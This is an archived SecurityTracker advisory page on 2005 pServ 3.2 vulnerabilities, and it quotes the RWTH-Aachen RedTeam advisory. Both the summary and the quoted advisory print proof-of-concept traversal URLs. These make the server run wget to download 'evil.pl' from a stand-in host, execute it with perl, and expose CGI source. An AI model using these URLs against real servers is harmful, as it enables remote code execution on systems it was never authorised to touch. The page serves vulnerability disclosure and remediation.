SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   pico Server (pServ) Vendors:   pserv.sourceforge.net
pServ Discloses CGI Source to Remote Users, Lets Remote Users Execute Arbitrary Code, and Lets Local Users View Potentially Privileged Files
SecurityTracker Alert ID:  1013977
SecurityTracker URL:  http://securitytracker.com/id/1013977
CVE Reference:   CVE-2005-1365, CVE-2005-1366, CVE-2005-1367   (Links to External Site)
Date:  May 17 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.2; possibly prior versions
Description:   Several vulnerabilities were reported in Pico Server (pServ). A remote user can view the source of CGI scripts. A remote user can execute arbitrary code on the target system. A local user can view files with the privileges of the web server.

The server does not properly protect against directory traversal attacks. If pServ on the target system has been compiled with CGI-BIN support, then a remote user can supply a specially crafted URL to execute arbitrary programs on the target system [CVE: CVE-2005-1365]. The code will run with the privileges of the pServ process.

A demonstration exploit URL to invoke 'wget' to load 'evil.pl' to the target system is provided:

http://[target]:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

A demonstration exploit URL to subsequently invoke the 'evil.pl' script is provided:

http://[target]:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl

A remote user can supply a specially crafted URL to view the source of CGI scripts in the 'cgi-bin' directory [CVE: CVE-2005-1366]. A demonstration exploit URL to access the source of the 'test.pl' script is provided:

http://[target]:2000/somedir/../cgi-bin/test.pl

The web server does not differentiate between files and symbolic links [CVE: CVE-2005-1367]. A local user with access to a web server directory can create a symbolic link from a critical file on the system to a file in the web server directory. Then, the user can access the web server to view the file with the privileges of the pServ process.

The vendor was notified on May 2, 2005.

Claus R. F. Overbeck or RedTeam at the Laboratory for Dependable Distributed Systems at RWTH-Aachen University reported these vulnerabilities.

Impact:   A remote user can view the contents of CGI scripts.

A remote user can execute arbitrary code on the target system with the privileges of the pServ process.

A local user can view files on the target system with the privileges of the pServ process.

Solution:   The vendor has issued a fixed version (3.3) for the remote vulnerabilities, available at:

http://sourceforge.net/project/showfiles.php?group_id=59378

The vendor does not plan to issue a fix for the local vulnerability.

Vendor URL:  sourceforge.net/projects/pserv (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Pico Server (pServ) Remote Command Injection


            Advisory: Pico Server (pServ) Remote Command Injection

RedTeam found a remote command injection in Pico Server (pServ) which results
in a remote attacker being able to issue arbitrary commands on the server.

Details
=======

Product: Pico Server (pServ)
Affected Version: 3.2(verified), <=3.2 probably too
Immune Version: 3.3
OS affected: all
Security-Risk: very high
Remote-Exploit: yes
Vendor-URL: http://pserv.sourceforge.net/
Vendor-Status: new version available
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010
Advisory-Status: published
CVE: CAN-2005-1365
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #)


Introduction
============
>From http://pserv.sourceforge.net/
Pico Server is a small web server. It is meant to be portable and
configurable.

* small, portable
* fast
* CGI-BIN support
* auto-indexing of directories
* access and error logging (see p-reporter for an analyzer)
* forking or single-connection at choice

Pico Server (pServ) is written in portable C (K&R style so it can compile on
older compilers too) and sports several options that by means of #define
statements can customize the behavior, the performance and the feature set so
to be able to fit better the the requisites.

If pServ is compiled with support for CGI-BIN a remote attacker is able to
execute any program (with pServ permissions) on the server by traversing out
of the cgi-bin directory.

More Details
============

pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as
cgi-scripts.
To avoid that a user traverses out of the cgi-bin using traditional /../,
pServ parses the requested url. It increases a counter by one if it parses a
/ (new subdir) and decreases the counter if ist parses /../. If the counter
goes below zero the url is rejected as illegal. Unfortunately an attacker can
avoid beeing rejected, just using enough / in the url (without directory
names between them), so he can traverse out of the cgi-bin by adding some
/../ . This lets the attacker execute any program on the server (with pServ
permissions).

Proof of Concept
================

The following url downloads a script (or executable) to the server:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl

This is how the script can be executed afterwards:
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl


Workaround
==========

The only workaround is to compile pServ without support for cgi-bin.

Fix
===

The Developers have released Version 3.3. This version should fix the
problem. The changes have not been tested by RedTeam, yet.

Security Risk
=============

The security risk is rated very high because a remote attacker can use this
flaw to execute arbitrary code on the server (with the permissions of pServ).

History
=======

2005-04-29 found
2005-05-02 first attempt to inform developers
2005-05-02 CAN-number assigned
2005-05-04 second attempt to inform developers
2005-05-16 new version released. Advisory published

RedTeam
=======

RedTeam is a penetration testing group working at the Laboratory for
Dependable Distributed Systems at RWTH-Aachen University. You can find more
Information on the RedTeam Project at
http://tsyklon.informatik.rwth-aachen.de/redteam/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC